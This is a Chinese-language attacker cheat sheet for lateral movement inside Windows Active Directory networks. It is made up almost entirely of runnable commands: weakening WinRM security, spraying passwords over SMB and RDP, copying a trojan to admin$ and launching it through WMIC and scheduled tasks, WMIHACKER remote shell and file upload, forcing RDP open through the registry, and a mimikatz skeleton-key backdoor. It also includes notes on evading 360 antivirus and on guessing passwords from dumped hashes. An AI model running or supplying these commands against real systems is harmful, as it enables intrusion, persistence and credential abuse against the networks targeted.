winrm set winrm/config/service/auth '@{Basic="true"}'
#修改WinRM默认端口
winrm set winrm/config/client/DefaultPorts '@{HTTPS="8888"}'
#为WinRM服务配置加密方式为允许非加密:
winrm set winrm/config/service '@{AllowUnencrypted="true"}'
#设置只允许指定IP远程连接WinRM
winrm set winrm/config/Client '@{TrustedHosts="192.168.10.*"}'
#执行命令
winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck '@{commandline="calc.exe"}'
#在dc机器上面执行命令并且指定用户名和密码
winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:dc -u:one\administrator -p:q123456.
winrs -r:192.168.22.33 -u:administrator -p:p@assw0rd ipconfig
2. https://github.com/Hackplayers/evil-winrm # 开源工具
3.https://github.com/bohops/WSMan-WinRM # 集合攻击,包括exe、ps1、js等
Usage
SharpWSManWinRM.cs
Usage: SharpWSManWinRM.exe <hostname> <command>
Usage: SharpWSManWinRM.exe <hostname> <command> <domain\user> <password>
Example: SharpWSManWinRM.exe host.domain.local notepad.exe
Example: SharpWSManWinRM.exe host.domain.local "cmd /c notepad.exe" domain\joe.user P@ssw0rd
WSManWinRM.ps1
Usage: Invoke-WSManWinRM -hostname <hostname> -command <command>
Usage: Invoke-WSManWinRM -hostname <hostname> -command <command> -user <domain\user> -password <password>
Example: import-module .\WSManWinRM.ps1
Invoke-WSManWinRM -hostname MyServer.domain.local -command calc.exe
Example: import-module .\WSManWinRM.ps1
Invoke-WSManWinRM -hostname MyServer.domain.local -command calc.exe -user domain\joe.user -password P@ssw0rd
WSManWinRM.vbs
Usage: cscript.exe SharpWSManWinRM.vbs <hostname> <command>
Usage: cscript.exe SharpWSManWinRM.vbs <hostname> <command> <domain\user> <password>
Example: cscript.exe SharpWSManWinRM.vbs host.domain.local notepad.exe
Example: cscript.exe SharpWSManWinRM.vbs host.domain.local "cmd /c notepad.exe" domain\joe.user P@ssw0rd
WSManWinRM.js
Usage: cscript.exe SharpWSManWinRM.js <hostname> <command>
Usage: cscript.exe SharpWSManWinRM.js <hostname> <command> <domain\user> <password>
Example: cscript.exe SharpWSManWinRM.js host.domain.local notepad.exe
Example: cscript.exe SharpWSManWinRM.js host.domain.local "cmd /c notepad.exe" domain\joe.user P@ssw0rd
CppWSManWinRM.cpp
Usage: CppWSManWinRM.exe <hostname> <command>
Example: CppWSManWinRM.exe host.domain.local notepad.exe
Note: Username/password option does not work yet
AD域渗透-横向渗透SMB(445):
# 汇总以获取到的各类密码,如数据库密码,主机hash解密密码,文件保存密码等等
1. fscan SMB模块探测:
fscan.exe -hf smb.txt -pf pwd.txt -o smb2win.txt
2. crack 弱口令检测:
for /c "delims=" %i in smb.txt do crack.exe -i %i -P pwd.txt -U user.txt >> smb2win.txt
3. 国内目标,代理流畅情况下:
(1) 超级弱口令工具,用代理挂进内网,进行扫描
(2)MSF的smb_login挂进内网,指定文件smb.txt,进行扫描
AD域渗透-横向渗透WMIC(139/135):
注意:(手艺活不能丢了,上线后维权,操作基于用户权限,不要SYSTEM权限)
1. 手工搞,直接执行SysDebug.exe,目标10.10.10.1,用户名:administrator 密码:loecho@123.. 木马:SysDebug.exe :(只能执行一次)
net use \\10.10.10.1\admin$ /user:"administrator" "loecho@123.."
copy SysDebug.exe \\10.10.10.1\admin$\debug
wmic /NODE:"10.10.10.1" /user:"administrator" /password:"loecho@123.." PROCESS call create "C:\Windows\Debug\SysDebug.exe"
del \\10.10.10.1\admin$\debug\SysDebug.exe /F
net use \\10.10.10.1\admin$ /del
2. 远程计划任务
schtasks / create /s "10.10.10.1" / u "administrator" / p "loecho@123.." / RL HIGHEST /F /tn "SysDebug" /tr c:\windows\debug\SysDebug.exe"/sc DAILY/mo 1/ST 08:25/RU SYSTEM
schtasks /query /s "10.10.10.1" /U "administrator" /P "loecho@123.." | findstr "SysDebug"
schtasks /run /tn SysDebug /s "10.10.10.1" /U " administrator" /P "loecho@123.."
schtasks /delete /F /tn SysDebug /s "10.10.10.1" /U " administrator" /P "loecho123.."
3. WMIHACKER 进行横向:(https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md)
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
有命令回显执行方式
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
无命令回显
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
模拟shell模式
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
文件上传-复制本机calc.exe到远程主机c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
文件下载-下载远程主机calc.exe到本地c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
# 暂时还能过 360, 如卡住多试几次就好, 单纯的远程执行下命令没啥问题
cscript //nologo wmihacker.vbs /cmd 192.168.159.7 administrator "admin!@#45" "tasklist" 1
cscript //nologo wmihacker.vbs /cmd 192.168.159.19 klion\its "admin!@#45" "query user" 1
# 由于程序内部还是用批处理在循环取结果, 默认直接调的 cmd.exe 会触发 360 拦截, 取不到结果
WMIcmd.exe -h 192.168.159.19 -u its -p admin!@#45 -d klion -c "systeminfo" -s 50000
WMIcmd.exe -h 192.168.159.7 -u administrator -p admin!@#45 -d . -c "systeminfo" -s 50000
# 无法在命令里执行重定向操作, 会触发 360 报警
cscript wmiexec.vbs /cmd 192.168.159.7 .\administrator admin!@#45 "netstat -ano -wait8000"
cscript wmiexec.vbs /cmd 192.168.159.19 klion\its admin!@#45 "query user -wait8000"
AD域渗透-横向渗透RDP(3389)
假设拿到DMZ区域的WEB服务器,DumpHash后,获得密码格式
# IP: 10.10.10.130 密码: ABCD130!@.
# 仔细划分为三部分:
# ABCD 目标公司名称简称
# 130 目标系统IP的C段地址
# !@. 密码策略问题,加的特殊字符
# 由此可以猜测主机内其他机器管理员密码情况,从而定点横向,从WEB到数据库从数据库到核心。。。。
(2) 通过高权限用户配合高密码进行横向RDP喷射
高权限域用户,Dump到明文密码,3389端口开启:
RDP端口查看方式:
# 通过注册表查询3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服务的端口
# 通过进程查看
tasklist /svc | find "TermService" # 找到对应服务进程的PID
netstat -ano | find "3220" # 找到进程对应的端口号
# 通过监听端口查看
netstat -ano | findstr LIS # 查看当前监听端口,有些情况可能RDP端口更改
强开RDP端口方法:
# 注册表开启,高权限用户:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f # 监听 3389 端口
# 注册表文件开启,高权限用户:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
# Wmic启动远程主机RDP服务:
wmic /node: "10.10.10.130" /USER:"10.10.10.130\administrator" PATH win32_erminalservicesetting WHERE (__Class!="")
2. 国内目标,网络环境稳定:
超级弱口令工具,挂代理进去内网进行,3389的密码碰撞
(通常SMB喷射完的目标,就以这种方法去连3389)
AD域渗透-万能密码:
# 所有用户通用密码,skeleton,重启失效
mimikatz.exe privilege::debug "misc::skeleton"
AD域渗透-通过目标各类服务漏洞,进行横向渗透
(WEB-Nday、Redis、MSSQL-RCE、MYSQL提权)